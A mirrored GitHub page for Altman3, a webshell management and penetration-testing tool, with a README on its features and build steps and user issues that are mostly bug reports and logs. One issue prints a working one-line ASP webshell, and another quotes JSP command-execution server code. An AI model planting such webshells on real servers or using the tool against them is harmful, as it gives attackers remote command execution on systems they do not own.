Giter VIP home page Giter VIP logo

altman's Introduction

Altman3

Altman version .net required version mono required version gtksharp required version

Join The Forums | Official Website | 中文版Readme

Disclaimer: This program is only for learning and research! Users shall comply with relevant laws and regulations of the state! I shall not have any legal liability for improper use!

Introduction

Altman3 is a penetration testing software, which is web-hosted on Github Pages.

Up to now, the software is capable of:

  • Webshell module: the xml definition is adopted for customized script type and function, as well as encryption/encoding.
    • Shell management plugin
    • Command execution plugin
    • File management plugin
    • Database management plugin
    • Script types supported include: asp, aspx, php, jspFull, python.
  • Encoder plugin
  • IP address query plugin
  • Plugin management center
  • Custom plugin: support for the use of C# or IronPython to program plugins or services
  • Plugin service mechanism: the plugin can recall service of other plugins.

Compile

  1. Create Build, Build\Bin, Build\Plugins, Build\Services directory
  2. Copy all the files under the Resources\RunNeed directory to the Build directory
  3. Copy all the files under the Libraries\IronPython directory to the Build\Bin directory (if you have already installed IronPython on the host, skip this step).
  4. Copy all the files under the Libraries\Sqlite3 directory to the Build directory
  5. Use VS2012 (or higher version) or MonoDevelop to compile
  6. For host of Linux or Mac, errors may be reported during plugin compiling as windows commands are incompatible in Linux or Mac.
  • Thus you can change the word copy in file *.csproj to cp,and the word call to sh, and then recompile.
  • Or you can ignore this error and manually copy the compiled dll plugin to the Plugins directory, where the path must be similar to the Plugins\ShellCmder\ShellCmder.dll
  1. If you need to compile a Mac version, manually copy all files (except Altman.Mac) under the Build directory to the Build\Altman.Mac\Contents\MonoBundle directory before Debug or running.

examples

Windows(cygwin reference to the following)
git clone https://github.com/keepwn/Altman.git
cd Altman/
# Run  batch-on-windows.bat
# Use VS2012 (or the latest version) to compile Altman
Linux

Installation mono environment:
Ubuntu or Debian
sudo apt-get install mono-devel mono-complete monodevelop
Other linux : <http://www.mono-project.com/download/>

git clone https://github.com/keepwn/Altman.git
cd Altman/ && chmod +x batch-on-linux.sh
./batch-on-linux.sh
monodevelop Source/SecurityTools.sln  
# Use monodevelop to compile Altman
Mac
git clone https://github.com/keepwn/Altman.git
cd Altman/
./batch-on-mac-beforeBuild.sh
# Use monodevelop to compile Altman
# After build success
./batch-on-mac-afterBuild.sh

Compiled output:

  • Altman/Build/Altman.Gtk.exe (gtk)
  • Altman/Build/Altman.WinForm.exe (windows)
  • Altman/Build/Altman.Mac (mac)

Running

Altman3 is based on .Net4.0, can be perfect run in Windows, Linux, Mac and other platforms via Eto.Form.

  • For Windows,
    • Double click to run Altman.Winform.exe; installment of .Net4.0 is required.
    • Double click to run Altman.Gtk.exe; installment of .Net4.0 and gtk-sharp2 is required.
  • For Linux,
    • Run mono Altman.Gtk.exe under command line; installment of Mono, libgdiplus and gtk-sharp2 is required.
  • For OS X,
    • Run mono Altman.Gtk.exe under command line; installment of Mono and gtk-sharp2 is required.
    • Double click to run Altman.Mac, installment of Mono is required.
  • How to install the mono environment in a more simple way
  • If you need to enable the IronPython support, you need to install IronPython (if the program already includes IronPython, additional installment is not necessary)
  • For common errors, please visit FAQ

Plugins

Altman3 uses the MEF plugin architecture and also supports IronPython.

  • Adopt C# to compile plugins/services
  • Adopt IronPython to compile plugins/services

Visit wiki to get the documentation on plugin development

Copyright

This program is subject to the GPLv2 protocol; please refer to the LICENSE file under the root directory for details.

Improvement and suggestions

Submit question OR improve code

altman's People

Contributors

aaaaaaaannn avatar hahahahahahahahahahahahahahahahahahaha avatar keepwn avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

altman's Issues

IIS6+ASP.NET 执行错误

在IIS6+ASP.NET环境上执行aspEval類型,Shell内容为
----------档名:1.asp---------------
<%eval request("as")%>
------------End of file--------------
这样执行FileManager的时候会出错,但使用chopper或Hatchet一樣的Shell都是正常的

Mac OS X 10.10.1 Release编译运行出错

darkray@D4rkZ0n3:~$ mono -V
Mono JIT compiler version 3.10.0 ((detached/92c4884 Thu Nov 13 23:27:38 EST 2014)
Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com
TLS: normal
SIGSEGV: altstack
Notification: kqueue
Architecture: x86
Disabled: none
Misc: softdebug
LLVM: yes(3.4svn-mono-(detached/e656cac)
GC: sgen
这是mono版本,运行之后提示
Object reference not set to an instance of an object

希望加入IronPython/IronRuby支持

你不是在FreeBuf发布时提到:

“自定义要最大化,自由度也要最高”,这就是它的特色。

希望加入IronPython/IronRuby支持 吧他变成一个平台不是一个工具 这样才好玩
我们能写很多 自动化脚本
比如:

  • 双向加密
  • 构建蛋疼一句话
  • get local system
  • 等等

命令终端功能导致的无限请求

环境为ASPX,上传的是ASPX脚本。在命令终端下执行命令,默认要等到有返回结果才允许我们再输入新命令;在测试环境我通过代理跳板与同内网目标WEB建立连接。我用Altman执行一条命令,当还没有返回结果时,多按一次回车过一段时间后该shell链接被内网IPS屏蔽掉了。通过连接监测程序,发现多按一次回车的时候导致了无限个请求(这就是被屏蔽的原因吧)。抱歉我这么说,这个BUG太可恶了~
demo2

demo1

[ShellCmder]: 命令终端问题

重现:
测试的是gtk版本,先执行一条命令,返回命令结果后按Up键翻找历史命令,第一次没问题,多按一次命令终端界面就会被重新清屏,内容显示混乱也见不到命令交互行。按回车键就会恢复正常。输入法调成IBUS拼音模式,奇怪的是还能在命令行界面随意编辑(在IBUS输入法下按shift 转为英文更明显),命令交互处要输入命令,自己要将光标点过去才行,不然无法定位到这里。我将IBUS挑换为系统默认英文输入模式就一切正常了。

使用的过程中经常出现,这里想单独测试一下还找不出来,没感觉是IBUS出的问题,无意中将输入法调为IBUS问题就重现了,可能是IBUS问题。这个问题比较隐蔽,希望作者可以解决。

你好,JSP linux 环境支持不是很好

demo2
在linux环境直接执行命令不可以.

服务端中有这样一段代码
String ExecuteCommandCode(String cmdPath, String command) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = { cmdPath, File.separator=="/"?"-c":"/c", command };

我想其中-c 这部分作者有考虑过linux bash 环境.我不太了解项目该部分的细节代码流程,不知道怎么将命令解释器变更为/bin/sh。谢谢!

你的作品太棒了,永远支持你,望作者持续开发。我想我也可以在shell服务端代码上帮助altman完善。

问题:代理功能

Altman有代理功能,不过没具体去测试。设置代理的时候HTTP or SOCKS5/4 可以给与提示,代理功能还是很实用的一个功能,希望作者可以做好!

关于user-agent

可能没照顾到作者的感受,这是等作者更新之前最后一个issue.
user-agent功能不能管理,有些不灵活。对于环境比较严格的情况下,我会尽量删掉altman user-agent 标记。现在我通过改xml做到。程序上可以直接编辑就好了!
在xml中添加了上千个user-agent 让altman自由切换,当数量较多时还是会影响到程序启动速度和选项功能。任性了~作者怎么看?

作者有捐助需要的话,建议提供一个捐助账户。
不要多怪,我想给您捐助一些钱。

缺陷:shell管理器右键网络功能导致的卡顿

测试在Altman Windows版本中shell管理器右键功能在高网络延迟情况下会出现界面卡顿。个人估计应该是主线程等待数据返回过程中阻塞了主界面正常响应。作者可以在实际情况测试看看。谢谢!

VS2013 Debug Windows 编译出错

错误 14 未能找到类型或命名空间名称“Box”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 17 26 Altman.Gtk
错误 8 未能找到类型或命名空间名称“Cairo”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 3 7 Altman.Gtk
错误 9 未能找到类型或命名空间名称“Gdk”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 8 7 Altman.Gtk
错误 10 未能找到类型或命名空间名称“Gtk”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 9 7 Altman.Gtk
错误 11 未能找到类型或命名空间名称“Gtk”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 10 16 Altman.Gtk
错误 12 未能找到类型或命名空间名称“Gtk”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 12 15 Altman.Gtk
错误 13 未能找到类型或命名空间名称“Gtk”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 13 15 Altman.Gtk
错误 15 未能找到类型或命名空间名称“Notebook”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 22 10 Altman.Gtk
错误 16 未能找到类型或命名空间名称“Notebook”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 29 32 Altman.Gtk
错误 17 未能找到类型或命名空间名称“Notebook”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 88 52 Altman.Gtk
错误 18 未能找到类型或命名空间名称“SwitchPageArgs”(是否缺少 using 指令或程序集引用?) D:\OpenSourceProject\Altman-3.0.0\Source\Altman.Gtk\TabControlPlusHandler.cs 129 43 Altman.Gtk

kali安装启动报错

kali安装报错如下,求解,安装使用的是apt-get install mono-4.0-gac monodevelop还有你推荐安装的那三个东西,不知道什么原因报错如下

System.Windows.Forms.SplitContainer doesn't implement interface System.ComponentModel.ISupportInitialize

Stacktrace:

at Altman.Forms.FormMain.InitializeComponent () <0x0055e>

at Altman.Forms.FormMain..ctor () <0x00023>

at (wrapper remoting-invoke-with-check) Altman.Forms.FormMain..ctor () <0xffffffff>

at Altman.Program.DoInShadowCopyFilesDomain () <0x0003b>

at System.AppDomain.DoCallBack (System.CrossAppDomainDelegate) <0x00014>

at (wrapper remoting-invoke-with-check) System.AppDomain.DoCallBack (System.CrossAppDomainDelegate) <0xffffffff>

at (wrapper xdomain-dispatch) System.AppDomain.DoCallBack (object,byte[]&,byte[]&) <0xffffffff>

at (wrapper xdomain-invoke) System.AppDomain.DoCallBack (System.CrossAppDomainDelegate) <0xffffffff>

at (wrapper remoting-invoke-with-check) System.AppDomain.DoCallBack (System.CrossAppDomainDelegate) <0xffffffff>

at Altman.Program.Main () <0x00253>

at (wrapper runtime-invoke) object.runtime_invoke_void (object,intptr,intptr,intptr) <0xffffffff>

Native stacktrace:

mono() [0x80e863d]

linux-gate.so.1(__kernel_rt_sigreturn+0) [0xb774040c]

linux-gate.so.1(__kernel_vsyscall+0x10) [0xb7740424]

/lib/i386-linux-gnu/i686/cmov/libc.so.6(gsignal+0x47) [0xb7533307]

/lib/i386-linux-gnu/i686/cmov/libc.so.6(abort+0x143) [0xb75349c3]

mono() [0x821b3b7]

mono() [0x821b3f3]

mono() [0x80ea0a9]

mono() [0x80ea864]

[0xb772dc74]

[0xb3b4cf54]

[0xb3b4cef0]

[0xb541227c]

[0xb5412235]

[0xb54121ec]

[0xb541135c]

[0xb542f8c3]

[0xb541a40c]

[0xb562bffc]

[0xb562c0de]

mono() [0x8068fec]

Debug info from gdb:

warning: Could not load shared library symbols for linux-gate.so.1.

Do you need "set solib-search-path" or "set sysroot"?

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".

莫名的BUG,打开shell一会儿就自动崩溃

有关调用实时(JIT)调试而不是此对话框的详细信息,
请参见此消息的结尾。

************** 异常文本 **************
System.ArgumentException: 参数无效。
在 System.Drawing.Bitmap..ctor(Int32 width, Int32 height, PixelFormat format)
在 System.Drawing.Bitmap..ctor(Int32 width, Int32 height)
在 System.Drawing.Icon.BmpFrame()
在 System.Drawing.Icon.ToBitmap()
在 System.Windows.Forms.ThreadExceptionDialog..ctor(Exception t)
在 System.Windows.Forms.Application.ThreadContext.OnThreadException(Exception t)
在 System.Windows.Forms.Control.InvokeMarshaledCallbacks()
在 System.Windows.Forms.Control.WndProc(Message& m)
在 System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
在 System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
在 System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

************** 已加载的程序集 **************
mscorlib
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll

Altman.WinForm
程序集版本:1.0.0.0
Win32 版本:1.0.0.0

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Altman.WinForm.EXE

Eto
程序集版本:2.0.5666.28629
Win32 版本:2.0.5666.28629

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Eto.DLL

Eto.WinForms
程序集版本:2.0.5666.28630
Win32 版本:2.0.5666.28630

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Eto.WinForms.DLL

System.Windows.Forms
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll

System
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll

System.Drawing
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll

Altman
程序集版本:3.0.1.31307
Win32 版本:3.0.1.31307

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Altman.DLL

System.Core
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll

Altman.Util
程序集版本:1.0.0.0
Win32 版本:1.0.0.0

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Altman.Util.DLL

Altman.Plugin
程序集版本:1.4.0.0
Win32 版本:1.4.0.0

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Altman.Plugin.DLL

Altman.Webshell
程序集版本:1.0.0.0
Win32 版本:1.0.0.0

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Altman.Webshell.DLL

System.Xml
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll

System.Xml.Linq
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml.Linq/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.Linq.dll

System.Data
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.Data/v4.0_4.0.0.0__b77a5c561934e089/System.Data.dll

System.ComponentModel.Composition
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.ComponentModel.Composition/v4.0_4.0.0.0__b77a5c561934e089/System.ComponentModel.Composition.dll

DbManager
程序集版本:1.4.2.0
Win32 版本:1.4.2.0

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/DBMANAGER/DBMANAGER.DLL

DeveloperTool
程序集版本:1.4.0.0
Win32 版本:1.0.0.0

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/DEVELOPERTOOL/DEVELOPERTOOL.DLL

DoNetPluginTest
程序集版本:1.4.0.0
Win32 版本:1.4.0.0

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/DONETPLUGINTEST/DONETPLUGINTEST.DLL

Encoder
程序集版本:1.4.0.0
Win32 版本:1.0.0.0

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/ENCODER/ENCODER.DLL

FileManager
程序集版本:1.4.4.4
Win32 版本:1.4.4.4

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/FILEMANAGER/FILEMANAGER.DLL

IPQuery
程序集版本:1.4.1.0
Win32 版本:1.0.0.0

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/IPQUERY/IPQUERY.DLL

Newtonsoft.Json
程序集版本:6.0.0.0
Win32 版本:6.0.6.17820

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Newtonsoft.Json.DLL

Ionic.Zip.Reduced
程序集版本:1.9.1.9000
Win32 版本:1.9.1.9000

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/PLUGINMANAGER/IONIC.ZIP.REDUCED.DLL

PluginManager
程序集版本:1.4.2.2
Win32 版本:1.4.2.2

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/PLUGINMANAGER/PLUGINMANAGER.DLL

ShellCmder
程序集版本:1.4.0.1
Win32 版本:1.4.0.1

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/SHELLCMDER/SHELLCMDER.DLL

ShellManager
程序集版本:1.4.3.1
Win32 版本:1.4.3.1

基本代码:file:///C:/SOFT/ALTMAN.WINFORM.AND.GTK_V3.0.1/PLUGINS/SHELLMANAGER/SHELLMANAGER.DLL

System.Configuration
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll

System.Windows.Forms.resources
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms.resources/v4.0_4.0.0.0_zh-Hans_b77a5c561934e089/System.Windows.Forms.resources.dll

Microsoft.CSharp
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/Microsoft.CSharp/v4.0_4.0.0.0__b03f5f7f11d50a3a/Microsoft.CSharp.dll

Mono.Data.Sqlite
程序集版本:4.0.0.0
Win32 版本:4.0.0.0

基本代码:file:///C:/soft/Altman.Winform.And.Gtk_v3.0.1/Bin/Mono.Data.Sqlite.DLL

System.Transactions
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.Transactions/v4.0_4.0.0.0__b77a5c561934e089/System.Transactions.dll

System.EnterpriseServices
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.EnterpriseServices/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.EnterpriseServices.dll

System.Numerics
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Numerics/v4.0_4.0.0.0__b77a5c561934e089/System.Numerics.dll

System.Dynamic
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Dynamic/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Dynamic.dll

Anonymously Hosted DynamicMethods Assembly
程序集版本:0.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_32/mscorlib/v4.0_4.0.0.0__b77a5c561934e089/mscorlib.dll

System.Web
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.Web/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Web.dll

System.resources
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.resources/v4.0_4.0.0.0_zh-Hans_b77a5c561934e089/System.resources.dll

System.Drawing.resources
程序集版本:4.0.0.0
Win32 版本:4.6.1055.0 built by: NETFXREL2

基本代码:file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing.resources/v4.0_4.0.0.0_zh-Hans_b03f5f7f11d50a3a/System.Drawing.resources.dll

************** JIT 调试 **************
要启用实时(JIT)调试,
该应用程序或计算机的 .config 文件(machine.config)的 system.windows.forms 节中必须设置
jitDebugging 值。
编译应用程序时还必须启用
调试。

例如:

启用 JIT 调试后,任何未经处理的异常
都将被发送到在此计算机上注册的 JIT 调试器,
而不是由此对话框处理。

问题/建议:文件管理器若干问题

问题一:目录树shell所在路径始终展开

比如你的shell路径是在d:\www
第一次打开文件管理器,目录树就会自动定位到d:\www
此时你在目录树将所在shell目录收起(也就是d:\www\)
再访问另外一个路径,比如是d:\soft.
d:\soft展开后,shell所在路径同时(d:\www\)也被展开了(本来是收起的).
就是说访问任何一个父级路径,shell所在路径始终被展开。这样对于目录多的情况,浏览起来非常吃力。

问题二:路径输入框对回车键无效
比如我在路径输入栏里填写一个自定义路径要按Dir键才有回显,而回车键却不行。有点不灵活~

问题三:对于linux来说路径输入框里总是多了一个/
//var/log
(路径前面Altman多添加了一个/)

问题四:通过目录树选择的路径和dir按钮进入的路径产生冲突
比如在目录树中进入了A路径,这时你突发奇想用路径输入栏进入了一个B路径(dir按钮进入)。
这时你在文件列表里右键“刷新”却显示的是A路径的文件列表。不同的路径,地址变量应该是绝对的,在一定程度上没有共通,才导致的。 ( ͡° ͜ʖ ͡°)  

建议一:上传/下载可以加上进度条就好了
对于我们来说进度条太重要了,多一个进度条可以让我们方便了解状态。

建议二:打开文件类型默认是脚本文件,可以取消吗?
此处感觉有一点多余了,每次上传不同类型文件都要重新作一番调整。好没有爱~ヽ(.◕ฺˇд ˇ◕ฺ;)ノ

建议三:进入目录需要双击图标才行~
对于一般用户可能一下子不能适应,现在双击文件名就会进入命名状态,我感觉大可不必,可以肯定大部分用户还是喜欢通过右键菜单来重命名。

建议四:右键编辑键和删除键挨的也太近了
鄙人长年有手抖的毛病,加上Altman先天性,已经错干好多文件了。希望删除可以靠后一点。另外不可逆操作最好加上确认框。

无法运行?

我直接clone了master的代码,然后用vs2013打开后,启动Altman.WinForm,然后报Object reference not set to an instance of an object.

Program.cs L30

appDomain.ExecuteAssembly(Assembly.GetExecutingAssembly().CodeBase);

“System.NullReferenceException”类型的未经处理的异常在 Altman.WinForm.exe 中发生

其他信息: Object reference not set to an instance of an object.

小小的建议

大神这款工具非常不错,但我觉得没必要将一些精力开发在多平台上面,因为玩安全的基本都是虚拟机,跨平台完全没必要,应该集中所有精力开发window版本的功能,在稳定性上处理,
1:扩充脚本插件的使用,加入如内网渗透的一些插件支持,
2:加入绕过防护的支持等,
3:加入代理提权的一些功能
这才是这款工具的核心,工具虽好,但发现贡献代码的没几个,我有时间也会学习,等到了能为g主分担时在来提交代码

password with #

my password contains the # character he is not working properly, what do you say?

反馈一个BUG

在编辑Shell配置数据库设置的时候 如果含有字符 & 就会报错. 望修正

sqlConnection problem

I can not access the database in any way I always get the same message

shell's sqlConnection is null or space

here is the example of my configuration, I already tried several variations

<sqlConnection>
<type>mysql</type>
<host>127.0.0.1</host>
<user>root</user>
<pass>p4ssw0rd</pass>
<language>utf-8</language>
</sqlConnection>

[FileManager]: 发现一个小瑕疵

^_^ 最近看你更新的快,好多问题都得到了修复。我不老实再提交一下吧!
上次提的一个gtk 文件管理器DIR按钮回车键没反应,这次实际环境中发现回车后路径的输入光标焦点跑到第一位去了。不知道咋改,我pull下说明吧 ㄟ(◑‿◐ )ㄏ

CustomType - jspBig.type ServerCode has compatibility problem.

在 tomcat 5.5環境中會顯示下面錯誤訊息:
'for each' statements are only available if source level is 5.0

建議將jspBig.type的ServerCode
29:for (File file:roots) {
30: s+=file.getPath().substring(0,2)+" ";
31:}
取代成
for (int i = 0; i < roots.length; i++) {
s+=roots[i].toString().substring(0, 2)+" ";
}

编译出来不见Altman主程序

Building Solution: SecurityTools (Release|Linux)

Building: Altman.Util (Release)

Build started 1/13/2016 20:11:32 AM.


Project "/home/Altman/Source/Altman.Util/Altman.Util.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Util/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Util/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Util/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Mono/Mono.Data.Sqlite.dll' to '/home/Altman/Source/Altman.Util/bin/Release/Mono.Data.Sqlite.dll'

Done building project "/home/Altman/Source/Altman.Util/Altman.Util.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman.Util/Altman.Util.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 1 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.0929240

Building: Altman.Webshell (Release)

Build started 1/14/2016 8:11:32 AM.


Project "/home/Altman/Source/Altman.Webshell/Altman.Webshell.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Webshell/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Webshell/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Webshell/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Altman.Webshell/Altman.Webshell.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman.Webshell/Altman.Webshell.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 1 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.2587130

Building: Altman.Pex (Release)

Build started 1/14/2016 8:11:32 AM.


